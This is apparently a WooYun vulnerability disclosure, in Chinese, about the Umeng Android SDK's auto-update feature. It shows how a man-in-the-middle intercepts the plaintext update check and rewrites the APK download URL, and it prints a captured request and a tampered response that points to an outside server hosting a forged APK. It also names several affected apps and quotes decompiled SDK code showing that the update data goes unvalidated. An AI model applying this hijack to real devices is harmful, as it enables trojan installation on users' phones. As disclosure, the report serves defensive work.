WooYun.org

友盟SDK中自动更新（Android）版本，返回数据可以被中间人劫持，校验过程不严格，伪造升级包让app自动下载，进而植入木马。
根据测试，有的app使用友盟host进行更新，有的app使用自己的host进行更新，但是绝大部分app使用友盟sdk的app升级时，服务器返回数据为明文，且包含更新app包的url地址，可以直接劫持进行修改。
而根据友盟官网，友盟服务超过64万款APP。
随手对友盟官网的app进行测试

1 当贝市场
升级更新发包

POST http://au.umeng.com/api/check_app_update HTTP/1.1
Content-Length: 397
Content-Type: application/x-www-form-urlencoded
Host: au.umeng.com
Connection: Keep-Alive
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; SM-G900F Build/KOT49H)
content=%7B%22delta%22%3Afalse%2C%22package%22%3A%22com.dangbeimarket%22%2C%22appkey%22%3A%225352057e56240b09fe0654a4%22%2C%22sdk_version%22%3A%222.4.2.20140520%22%2C%22type%22%3A%22update%22%2C%22channel%22%3A%22znds%22%2C%22old_md5%22%3A%2298e76eaef8f1921ae77f29fbe42637f8%22%2C%22proto_ver%22%3A%221.4%22%2C%22idmd5%22%3A%224995cdc2664d3c8b4f981ba2934bed94%22%2C%22version_code%22%3A%2274%22%7D

拦截后，修改其中url地址，返回数据包

HTTP/1.1 200 OK
Server: Tengine
Date: Wed, 21 Oct 2015 08:56:42 GMT
Content-Type: application/json;charset=utf-8
Content-Length: 669
Connection: close
{"update":"Yes","version":"3.1.0","path":"http://121.15.129.246/app/xrt-v1.0.apk","origin":"","update_log":"1. sdk 升级测试\r\n2. 点击我吧~~，有惊喜哦\r\n3. 求rank，求点击\r\n4. duang。。。。。。\r\n","proto_ver":"1.4","delta":false,"new_md5":"840f65125e7a995f27871fa5ccdb449b","size":"2504007","patch_md5":"","target_size":"2504007","display_ads":false}

效果如下

2 穷游
使用fiddler拦截，修改返回url

效果图

3 豆瓣
使用fiddler拦截，修改返回url

效果图

4 中华万年历
使用fiddler拦截，修改返回url

效果图

不管app是使用友盟的host，还是自己的host，都可以对其进行url拦截，修改。
反汇编友盟sdk代码
可以看到更新流程如下，只关心服务器返回json到下载url的实现，水平有限可能过程有遗漏。首先
（1）在package com.umeng.update.UpdateDialogActivity中，点击确定后使用UpdateResponse类保存服务器的json信息
UpdateResponse b;
this.b = ((UpdateResponse)getIntent().getExtras().getSerializable("response"));
（2）在package com.umeng.update. UpdateResponse中
在构造函数中，调用a(paramJSONObject);进行对象初始化
public UpdateResponse(JSONObject paramJSONObject)
{
super(paramJSONObject);
a(paramJSONObject);
}
（3）在a中，只判断服务器返回的json中的update是否为Yes，如果是保存，path（对应json中的url）, new_md5（对应json中的md5值），target_size，version等参数
private void a(JSONObject paramJSONObject)
{
try
{
this.hasUpdate = "Yes".equalsIgnoreCase(paramJSONObject.optString("update"));
if (this.hasUpdate)
{
this.updateLog = paramJSONObject.getString("update_log");
this.version = paramJSONObject.getString("version");
this.path = paramJSONObject.getString("path");
this.target_size = paramJSONObject.optString("target_size");
this.new_md5 = paramJSONObject.optString("new_md5");
this.delta = paramJSONObject.optBoolean("delta");
if (this.delta)
{
this.patch_md5 = paramJSONObject.optString("patch_md5");
this.size = paramJSONObject.optString("size");
this.origin = paramJSONObject.optString("origin");
}
}
return;
}
catch (Exception paramJSONObject)
{
paramJSONObject.printStackTrace();
}
}
（4）然后到com.umeng.update. UmengUpdateAgent中a函数调用startDownload进行下载并调用startInstall进行安装。
private static void a(Context paramContext, UpdateResponse paramUpdateResponse, File paramFile)
{
if (paramFile == null)
{
startDownload(paramContext, paramUpdateResponse);
return;
}
startInstall(paramContext, paramFile);
}
startDownload函数如下
public static void startDownload(Context paramContext, UpdateResponse paramUpdateResponse)
{
if ((paramUpdateResponse.delta) && (UpdateConfig.isDeltaUpdate()))
{
e.a(paramContext, paramUpdateResponse.origin, paramUpdateResponse.new_md5, paramUpdateResponse.path, paramUpdateResponse.patch_md5, c);
e.b();
return;
}
e.a(paramContext, paramUpdateResponse.path, paramUpdateResponse.new_md5, null, null, c);
e.c();
}
（5）水平有限没能继续跟入函数，但是从传递的参数，可以看到友盟sdk对服务器返回json数据并没有进行校验，对url也没有黑白名单机制，最有可能进行的就是返回的md5和apk进行校验，很容易对其进行中间人劫持攻击。